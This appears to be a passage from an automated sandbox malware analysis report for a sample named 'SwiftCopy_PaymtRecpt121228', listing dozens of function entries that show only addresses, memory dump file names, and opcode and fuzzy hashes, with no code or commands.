                                                    • Source File: 00000000.00000002.2065779234.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9cd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a39ed03e5e2e5e940d1ea3be501d446eed44c02913c27f5db7e42560546ea402
                                                    • Instruction ID: 7ad0409467930ff9d89588cb634769cca116437fbb0eaf3ec117cec7d9f8e162
                                                    • Opcode Fuzzy Hash: a39ed03e5e2e5e940d1ea3be501d446eed44c02913c27f5db7e42560546ea402
                                                    • Instruction Fuzzy Hash: D5F062714053449EE7108A16DD84B66FFACEF56724F18C46EED484A286C3799C44CA75
                                                    Function 05A5D2A0 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7fdc10a734bba4360bede129c8b06084034b3a5d93533618d7b1deca6f1bdaa5
                                                    • Instruction ID: 2a918e1a796ad365b74c529490359dcee21dffc89b5cbcce5a9957071a8a792d
                                                    • Opcode Fuzzy Hash: 7fdc10a734bba4360bede129c8b06084034b3a5d93533618d7b1deca6f1bdaa5
                                                    • Instruction Fuzzy Hash: 5FF06D31920B089BCB11BF2DDC0589DBB78EF96321B41832AE98567254EF71D5A4CB90
                                                    Function 05A55F40 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47d3a7e0bfa0553e709ce5e2c4bd8edee241553d5614f236cbbf59baf5404ef9
                                                    • Instruction ID: 0e99f2376aab9b62aedac0aac2d343e5f617f3c024671ef9873aacb79a1880bb
                                                    • Opcode Fuzzy Hash: 47d3a7e0bfa0553e709ce5e2c4bd8edee241553d5614f236cbbf59baf5404ef9
                                                    • Instruction Fuzzy Hash: 68F0F0363103068FCB16AB28C840CAA3BBAEF863503180466F004CF269DA719801CBA0
                                                    Function 05A50E84 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f073593efa66ca47bf3278a8b73948d38ca4c6037bdb78cc227ad5e7d8f4b2da
                                                    • Instruction ID: 1793782b064a0de78c9599127af3545fee3380488a60370c6aa113ccc316c9ec
                                                    • Opcode Fuzzy Hash: f073593efa66ca47bf3278a8b73948d38ca4c6037bdb78cc227ad5e7d8f4b2da
                                                    • Instruction Fuzzy Hash: 00F01D729501098FDB50DF78C845BBDBBF5FB44306F0489BAE818D3255E639DA05DB81
                                                    Function 05A56E40 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d26b113c7716d994c55f2f17d06dabfd198cdde5702d79bdd2d9df3df2402a6b
                                                    • Instruction ID: f25ec96b214b7534249b20f232ab1c700509fb957f3a82b1b9e86dd6ec84ef99
                                                    • Opcode Fuzzy Hash: d26b113c7716d994c55f2f17d06dabfd198cdde5702d79bdd2d9df3df2402a6b
                                                    • Instruction Fuzzy Hash: 4A01BB70805219DFDF14DFAAC408BAEBAF5BF48760F548625EC25AB290D7744A44CF91
                                                    Function 05A51AC0 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5de773a28e0b23abdc6144c30fd5209f35a02e365b427f0a0b2ad2a0031bfde6
                                                    • Instruction ID: 30e37711b343f8864a162523bdfab980d4649ea3d14ce6efd8ba9e967a62ad85
                                                    • Opcode Fuzzy Hash: 5de773a28e0b23abdc6144c30fd5209f35a02e365b427f0a0b2ad2a0031bfde6
                                                    • Instruction Fuzzy Hash: A0F054367043149FCB18AB79E444A2E77ABEFC4321B04842DE44687340CE759C05CB95
                                                    Function 05A56EE0 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d54f4f7400f6d2ae13e7de2a83ac97f36dbdf1212ed72da0eae226ec8e5c5d23
                                                    • Instruction ID: 170a5a832d02e9eeca2b9638026bf04c546350702baa3cf0f49c8b832b4553be
                                                    • Opcode Fuzzy Hash: d54f4f7400f6d2ae13e7de2a83ac97f36dbdf1212ed72da0eae226ec8e5c5d23
                                                    • Instruction Fuzzy Hash: 30E06D72B001286F9304DAAEDC84D6BBBEDFBCC670361807AF508C7310DA319C01C6A0
                                                    Function 05A53548 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00996f148bc790965d76ba27a1e6648480646c3d4018a2ee205ed9229261a713
                                                    • Instruction ID: d13ca25eeb08e89408af23eb831c751f0d8dff929c437119fe9a8ea8bc59265f
                                                    • Opcode Fuzzy Hash: 00996f148bc790965d76ba27a1e6648480646c3d4018a2ee205ed9229261a713
                                                    • Instruction Fuzzy Hash: 9BF030729101198FDB50DF68C886BFD77F1FB04305F1485B6D418D7245E639D646CB80
                                                    Function 05A509C0 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5e9bd745332265fa1afeb70ba2cc18082ad1b905ec92e445c3e0cd0bd1c5e04
                                                    • Instruction ID: 48cf5e946a563554ab1873e53d161ce692f8f3327c88051525f206748be4ae62
                                                    • Opcode Fuzzy Hash: e5e9bd745332265fa1afeb70ba2cc18082ad1b905ec92e445c3e0cd0bd1c5e04
                                                    • Instruction Fuzzy Hash: 9CF0FE716147058F9F28CF28D442D9577E5FB053587340969E826CF305E7B2EC038B84
                                                    Function 05A50BD0 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53be9d48de200d3486cf45b3c2c9510d3c8c22262607b7eb582b9db6695e2d23
                                                    • Instruction ID: a948a46d28f510fde5abcbcd4ffc02b5172b7cb19e468b51ed6fdc436111a683
                                                    • Opcode Fuzzy Hash: 53be9d48de200d3486cf45b3c2c9510d3c8c22262607b7eb582b9db6695e2d23
                                                    • Instruction Fuzzy Hash: A4E0D8363645250BC724960DDC48B6E339BEBD9A21F1840B5E406CB792DE25DC0203E5
                                                    Function 05A54F6C Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0433674141982683760c068ea2d1efbc603bcf75decaf4db4434056919a43b0e
                                                    • Instruction ID: e7f829aa5f41b0c0ab31328d45a25113a5cd4a347a54632144833383fb489d7b
                                                    • Opcode Fuzzy Hash: 0433674141982683760c068ea2d1efbc603bcf75decaf4db4434056919a43b0e
                                                    • Instruction Fuzzy Hash: CEF0B731A18115DFEF10DB6CE44AFA833F2FB48726F004069F816971A4CB7899CACB21
                                                    Function 05A55F50 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 319f06f7f2d13bdbef14b7c15714b91ecd7bb74e17ec8d70d449fea634dfcdbc
                                                    • Instruction ID: ed0614977d3b874b22bbadb6a59fa40b062460f2957340f9b14e8294329f2e75
                                                    • Opcode Fuzzy Hash: 319f06f7f2d13bdbef14b7c15714b91ecd7bb74e17ec8d70d449fea634dfcdbc
                                                    • Instruction Fuzzy Hash: B2F030353112169FDB18AF29D450CAA3BEEEF893603544465F509CF228DB729C01CB90
                                                    Function 05A5DFA7 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8303127b4f40aadfe4629d7bd7452f14d3a3e26ed5bd8ab48fd665e675319b21
                                                    • Instruction ID: c7c1795a3256c65a9e36cc601e47e068aa13676e3573034d5ca03cd392a7d5bc
                                                    • Opcode Fuzzy Hash: 8303127b4f40aadfe4629d7bd7452f14d3a3e26ed5bd8ab48fd665e675319b21
                                                    • Instruction Fuzzy Hash: F1E026367413715FC309176C5452A6B7FB69FC5B24318C0ABE586CB786DCA08E0583A1
                                                    Function 05A5DF4B Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a0a44faa2d3be74f1b63fb1dc022b295039a09d499a89e106fb88da08c513e4
                                                    • Instruction ID: e5165549b1ff10b753c35cfb897a5f4e69d841f5061adcb804ba87e1c9ad9cbe
                                                    • Opcode Fuzzy Hash: 8a0a44faa2d3be74f1b63fb1dc022b295039a09d499a89e106fb88da08c513e4
                                                    • Instruction Fuzzy Hash: A3F0A73134D3814FD3215B789E10B593BA5AF41214F0505BE944ACB591D638D804C751
                                                    Function 05A53878 Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4558d6717804c21de45ec63da55ccb13f1a4d991fa1bef1e6a0b91dd06c8cd19
                                                    • Instruction ID: 978208c0c2725dbfbbc87c5f389701f21bf7043bc3b11a972b8464babeaae32c
                                                    • Opcode Fuzzy Hash: 4558d6717804c21de45ec63da55ccb13f1a4d991fa1bef1e6a0b91dd06c8cd19
                                                    • Instruction Fuzzy Hash: 08E06D33610524C68718DF48F4818BAB7E9E798665318845AE90CCA610E337DC03C780
                                                    Function 05A513C1 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b73fa6b8f3c2762c442bdcef0fce041fb93c76b4279de14629b55619f9d1f6b
                                                    • Instruction ID: cda608467acc9fa410ef0ceeb8cbce458790eab65b04fe0bfbc429f83169f1b3
                                                    • Opcode Fuzzy Hash: 1b73fa6b8f3c2762c442bdcef0fce041fb93c76b4279de14629b55619f9d1f6b
                                                    • Instruction Fuzzy Hash: 86F0E5332001446FCB06CE98E500BDD7F9ADF88211F08846AFE49C7161C779C912DB64
                                                    Function 05A509B0 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7466df2cc0687f46fee2c905fdac04309c299575217540330e931014898330a
                                                    • Instruction ID: fa9101b020fc68525c21f5d595c75b4a6a32c3a4cad3ee59c6aca0e7837d8380
                                                    • Opcode Fuzzy Hash: a7466df2cc0687f46fee2c905fdac04309c299575217540330e931014898330a
                                                    • Instruction Fuzzy Hash: 73E065312082558BCB25DB18E847A5A7BD5EB41314B24496DE446CB205E765E803CB85
                                                    Function 05A52B28 Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc4141d27c8d294b9efcedf2fef9f75360010b89c596355e3dc91bc599325a52
                                                    • Instruction ID: 578cdf66c5e924d5f674da65b4661ef0a0cb1358b2f5a39a1c1d3f0aa507f83c
                                                    • Opcode Fuzzy Hash: bc4141d27c8d294b9efcedf2fef9f75360010b89c596355e3dc91bc599325a52
                                                    • Instruction Fuzzy Hash: 52E0ED76B0015A9FCF01DF98D8859EE77B6FB98210B008016FA18D7341D7759D22DFA1
                                                    Function 05A513D0 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d450382f57f262bbaaac426b04b643fba81c152b760d42e3c32e9dae3524059f
                                                    • Instruction ID: 9c73517f3970b7600d67c7117f68c121c40824ee8c6998a8e7dc1f32ef170624
                                                    • Opcode Fuzzy Hash: d450382f57f262bbaaac426b04b643fba81c152b760d42e3c32e9dae3524059f
                                                    • Instruction Fuzzy Hash: D8E06D322001486BCB069A49E800E9E7B9EDB88210B088416F949C3151CA75981197A5
                                                    Function 05A52110 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d04fb759262b44b9ac1f249d648921d36e10f03a747f14767271ec0a03f42d2
                                                    • Instruction ID: 1d12ab0843ae6a56af4645d8a2af771f19752169feadb30b32b51c4564e2e162
                                                    • Opcode Fuzzy Hash: 3d04fb759262b44b9ac1f249d648921d36e10f03a747f14767271ec0a03f42d2
                                                    • Instruction Fuzzy Hash: F5E0D87220C35007C725D619F840D5FAB9ADEC1214704857ED455CB625DA659C0BC796
                                                    Function 05A50BE0 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71fc1c5801b4ad6b15b380a7a9ce45c83b6ec2dfb42eae575b01a5588418832e
                                                    • Instruction ID: 48769625d4ba66d3dd7c86517b21172d13886d1f30baed8fe46843d9be13d8dc
                                                    • Opcode Fuzzy Hash: 71fc1c5801b4ad6b15b380a7a9ce45c83b6ec2dfb42eae575b01a5588418832e
                                                    • Instruction Fuzzy Hash: B8E0C2363506150BC728A60DD808D7E339FEFCDA21B1880BAE90AC7766CE35DC4247A5
                                                    Function 05A5D251 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a56b99759b5376dbeccbe776e21cf5e64b8a974420d3debe4c92f8fa3c3244b
                                                    • Instruction ID: 6c99c5cd40e80c5ea7ad5ac042bd0e0e7e623a3ca8b0b3095df796bc5b27ab67
                                                    • Opcode Fuzzy Hash: 7a56b99759b5376dbeccbe776e21cf5e64b8a974420d3debe4c92f8fa3c3244b
                                                    • Instruction Fuzzy Hash: 36E0923100828A9FCB12CF64D94189D3FB1EE82221B0482C5E894DA1D3C73A5A62E751
                                                    Function 05A5BC70 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b73797c3ab759590902473e8e94deca19a77ac13f5dafed292dd674671c87b7
                                                    • Instruction ID: 3558bfea3c97f5aac6275c3f67741f417f68c7e29d873dd55513976790111e97
                                                    • Opcode Fuzzy Hash: 0b73797c3ab759590902473e8e94deca19a77ac13f5dafed292dd674671c87b7
                                                    • Instruction Fuzzy Hash: 09E08C312193288FD7160A356818ABB3FA5ABC62A2B5A8066E482C6191CA388901C7A4
                                                    Function 05A5BF58 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeca0b747900967c3f890e6c77bf470ee64a393e5eed7bea7b248a039ac84590
                                                    • Instruction ID: 3768a21db8c63133cea18e5d15071791c8eacacd8b6edcf0cd944cdf76ca6518
                                                    • Opcode Fuzzy Hash: aeca0b747900967c3f890e6c77bf470ee64a393e5eed7bea7b248a039ac84590
                                                    • Instruction Fuzzy Hash: EFF0ED71814348EFCB52AF75C5558997FB0EF16321B00C5AAF889CA001EA349659DF61
                                                    Function 05A58DC0 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: baf265f3f65bef2c84996fbf6deb59c333204e9a8ac91402071547445ecde636
                                                    • Instruction ID: 70922e8c6b882c4854db7d15519767ccf19c627f63e88a49a25f213f445b1392
                                                    • Opcode Fuzzy Hash: baf265f3f65bef2c84996fbf6deb59c333204e9a8ac91402071547445ecde636
                                                    • Instruction Fuzzy Hash: E9F0E5709482468FC700CF68D440D99BFF0AF06320F1081DAEC608B3B2C3388946DF81
                                                    Function 05A5BC38 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14344e5bdad4fe2b5291175cc7561dd49ec965fbaffc0d9145fae230c4b3fd61
                                                    • Instruction ID: e47b54612a18d9277a97c9be853a17d453214d3b3fca9c758e6dac826bde1804
                                                    • Opcode Fuzzy Hash: 14344e5bdad4fe2b5291175cc7561dd49ec965fbaffc0d9145fae230c4b3fd61
                                                    • Instruction Fuzzy Hash: E5E0C2357447108FC7065F68D6508983FB2EF4A2B130A80ABE485CB372CE34DC12C780
                                                    Function 05A5DFB8 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a86e0a75bfe242d46f9b057425792cafa9017880dc9255091831a088052913a4
                                                    • Instruction ID: 6f4dcc3716b11a34446ec051a23e421fb61b2b3373eb2c802e591c7261917061
                                                    • Opcode Fuzzy Hash: a86e0a75bfe242d46f9b057425792cafa9017880dc9255091831a088052913a4
                                                    • Instruction Fuzzy Hash: 20D05E2234033413C50462AE5457A6F7AEFD7C5B65754803AEA06C7389DCA18D0243E1
                                                    Function 05A5FF10 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1f2d96c564a5980c61c6680ee1b4a5cb640b65d250406532fd002b3cbcd546c
                                                    • Instruction ID: e12dc0d64eb3598d856803326bd8abfca6f0fbc1adafb6ca592484b006d11d00
                                                    • Opcode Fuzzy Hash: b1f2d96c564a5980c61c6680ee1b4a5cb640b65d250406532fd002b3cbcd546c
                                                    • Instruction Fuzzy Hash: 13E04F36100218BFDB029F859D00D967B79EF45264704C091F9444A122C632DA21EBA1
                                                    Function 05A5DF60 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 236711a745be25e471581c08ef3a8f767506593fa64ba66a1037f7002c8b08ac
                                                    • Instruction ID: 53b86bec9cce482cff4d248beb7a065e6ae622d391b4a9f1e584877ac3b18f6c
                                                    • Opcode Fuzzy Hash: 236711a745be25e471581c08ef3a8f767506593fa64ba66a1037f7002c8b08ac
                                                    • Instruction Fuzzy Hash: 3EE08C303412018FE724AB78EE14FAA77DDFF44269F00097CAA1AC7280EA34E8008B91
                                                    Function 05A5BEA0 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3880a6e13e717e103012e8e11bce7f29bcf544fd4378713b66dfb5a54238def0
                                                    • Instruction ID: d17bfec311da3beeb2fc7c8b61bbc6c7fd89fa4c0849d24a390d429b8d857dc1
                                                    • Opcode Fuzzy Hash: 3880a6e13e717e103012e8e11bce7f29bcf544fd4378713b66dfb5a54238def0
                                                    • Instruction Fuzzy Hash: EAE0121674E5A40FD60B32645634DBE2F265A5242270901EAED9B8B692CD2C0E1B83EA
                                                    Function 05A55EF8 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c61f94a0482552c40d20e8f69c5ab28067c8dc7271b0f344e0f088d935b9829
                                                    • Instruction ID: d5a0c0e18c0c996518ced53254ac7d61e5eb11a115f8ecf08054c99626b93695
                                                    • Opcode Fuzzy Hash: 8c61f94a0482552c40d20e8f69c5ab28067c8dc7271b0f344e0f088d935b9829
                                                    • Instruction Fuzzy Hash: 3EF06D39D1828DAFCB16CBA0C8448DEBFB5EB42215B1882D6D86597692DA351B07DF80
                                                    Function 05A58DD0 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
